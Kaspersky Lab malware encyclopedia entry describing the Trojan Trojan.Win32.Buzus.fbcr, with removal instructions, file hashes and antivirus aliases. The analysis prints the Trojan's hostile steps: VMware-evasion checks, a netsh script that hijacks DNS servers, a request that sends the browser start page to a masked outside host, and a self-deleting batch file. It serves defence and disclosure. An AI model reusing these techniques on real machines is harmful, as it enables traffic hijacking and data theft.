English
The Internet threat alert status is currently normal. At present, no major epidemics or other serious incidents have been recorded by Kaspersky Lab’s monitoring service. Internet threat level: 1

Trojan.Win32.Buzus.fbcr

Detected Aug 09 2010 12:19 GMT
Released Aug 09 2010 20:58 GMT
Published Oct 26 2010 10:21 GMT

Manual description Auto description
This description was created by experts at Kaspersky Lab. It contains the most accurate information available about this program.

Technical Details
Payload
Removal instructions

Technical Details

This Trojan has a malicious payload. It is a Windows application (PE EXE file). It is 585 661 bytes in size. It is written in Delphi.


Payload

The program's main window is shown below:

Once launched, the Trojan performs the following actions:

  • If it detects the following processes, it ceases running:
    VMwareUser.exe
    VMwareService.exe
    VMwareTray.exe
    
  • It checks for the presence of the following system registry key (which presumably is created by other malicious programs):
    [HKLM\Software\Microsoft\HTTP_UPDATE]
  • It moves the following files:
    For Windows XP and Windows 2003:
    %Documents and Settings%\All Users\Templates\Directdb.xml
    For Windows Vista and Windows 7:
    %Temporary Internet Files%\Directdb.xml
    It moves these files under the following names respectively:
    %Documents and Settings%\All Users\Templates\qweoi.tmp
    %Temporary Internet Files%\qweoi.tmp
    
    Then it executes a deferred deletion of these files (the origin or ownership of the deleted files by certain applications has not been established).
  • It deletes the following files (the origin or ownership of the deleted files by certain applications has not been established):
    C:\RECYCLER\Update.exe
    C:\RECYCLER\UpdateSet.exe
    
  • It causes the following error message to be displayed:

    The Trojan also launches two copies of its body, into which it injects a code from its resources.

    The code injected into the first copy is 99 328 bytes in size. It is detected by Kaspersky Anti-Virus as Trojan-Downloader.Win32.Agent.eisi. The injected code performs the following actions:

  • It deletes the following file:
    <X>:\tmp.log
    where <X> indicates the system disk.
  • It runs the following command:
    ipconfig.exe /all >C:\tmp.log
    This command makes it possible to save Windows IP protocol settings to the file "C:\tmp.log".
  • It rewrites the content of the "C:\tmp.log" file with the following strings:
    pushd interface ip
    set dns name="<Name>" source=static addr=121.***.240 register=
    PRIMARY
    add dns name="<Name>" addr=125.***.219 index=2
    set wins name="<Name>" source=static addr=none
    popd
    
    where <Name> is the name of the network connection, for example "Local Area Connection". It runs the command shown below:
    netsh.exe -f C:\tmp.log
    This modifies the addresses of the main and auxiliary DNS servers, and, as a consequence, redirects all DNS requests to specified addresses (the DNS server modification method is implemented in such a way as to work only in those systems where the string "Ethernet adapter" when executing the "ipconfig /all" command has not been localized, i.e. it has not been translated into a national language. This method, for example, does not work for Russian localization, as the mentioned string is not encountered when the "ipconfig /all" command is displayed, since the localized string "Ethernet àäàïòåð" is displayed in its place.
  • It terminates the following process:
    ipconfig.exe
  • It sends a request to the following site:
    http://www.qq***nead.com/GetServer.asp?Mac=<StartPage>&otherInfo=ok
    where <StartPage> is the home page, received from the following registry key:
    [HKCU\Software\Microsoft\Internet Explorer\Main\Start Page]
  • It creates the directory:
    C:\RECYCLER\
    where it places its body as:
    Temp.dat
    and executes deferred deletion of this file. The code injected into the second copy is 479 232 bytes in size. This code performs the following actions:
  • It connects to the following resource using a GET request:
    http://yuanfa***43759.com/xg/updateinfo.htm
    At the time of writing, this resource was not accessible.

    The data received in response to this request is checked for the requested data (response code 200) and for the string

    Start
    The received data is then processed (presumably, the received data contains a list, possibly of URL addresses, as we can see in the code responsible for handling the received data that an extensive search is performed for delimiters, however the data processing mechanism has not been investigated, as the resource is no longer available and the data processing mechanism is data-driven).
  • If the server's response from the above-mentioned address does not contain the requested data, the "infmantion.bat" file is created in the working directory. This file contains the following strings:
    :try
    del /q /f "<Path_to_original_body_of_trojan>"
    if exist <Path_to_original_body_of_trojan> goto try
    del %0
    
    Running this file deletes the body of the Trojan.


Removal instructions

If your computer does not have antivirus protection and has been infected by this malicious program, follow the instructions below to delete it:

  1. Use Task Manager to terminate the malicious process.
  2. Delete the original Trojan file (its location will depend on how the program originally penetrated the infected computer).
  3. Delete the following file:
    %Temp%\<rnd>
    <X>:\tmp.log
    where <X> indicates the system disk.
  4. Your network administrator can provide the original values for the main and auxiliary DNS servers so you can restore them in your system.
  5. Perform a full scan of the computer using Kaspersky Anti-Virus with up-to-date antivirus databases (download a trial version).


MD5: FC3DE44747ABFBAA117ABB8EF705021F
SHA1: 49E735F831AFF55995564C3E2BCA82DF73E356AD


Bookmark and Share
Share
Trojan

This type of behaviour covers malicious programs that delete, block, modify, or copy data, disrupt computer or network performance, but which cannot be classified under any of the behaviours identified above.

This classification also covers “multipurpose” Trojan programs, i.e. those that are capable of conducting several actions at once and which demonstrate several Trojan behaviours in a single program. This means they cannot be indisputably classified as having any single behaviour.


Aliases

Trojan.Win32.Buzus.fbcr (Kaspersky Lab) is also known as:

  • Trojan: Generic.dx!tio (McAfee)
  • Mal/Packer (Sophos)
  • Trojan.PcClient-2361 (ClamAV)
  • Trj/Buzus.AH (Panda)
  • W32/Heuristic-210!Eldorado (FPROT)
  • Trojan:Win32/Remhead (MS(OneCare))
  • Trojan.DownLoader1.35450 (DrWeb)
  • a variant of Win32/TrojanDownloader.Agent.TGOQCW trojan (Nod32)
  • Trojan.Generic.4561194 (BitDef7)
  • Trojan.Generic.4555152 (BitDef7)
  • Trojan.Generic.4560739 (BitDef7)
  • Trojan.Agent.Delf.ROH (BitDef7)
  • Packed/NSPack (VirusBuster)
  • Win32:Malware-gen (AVAST)
  • Backdoor.Win32.GrayBird.ej (Ikarus)
  • Generic18.BKUU (AVG)
  • TR/ATRAPS.Gen (AVIRA)
  • W32/Packed_NsPack.I (Norman)
  • Trojan.Win32.Generic.52262102 (Rising)
  • Trojan.Win32.Generic.52259EAA (Rising)
  • Trojan.Win32.Generic.52259B43 (Rising)
  • Trojan.Win32.Buzus.fbcr [AVP] (FSecure)
  • Trojan.Win32.Buzus (Sunbelt)
  • Packed/NSPack (VirusBusterBeta)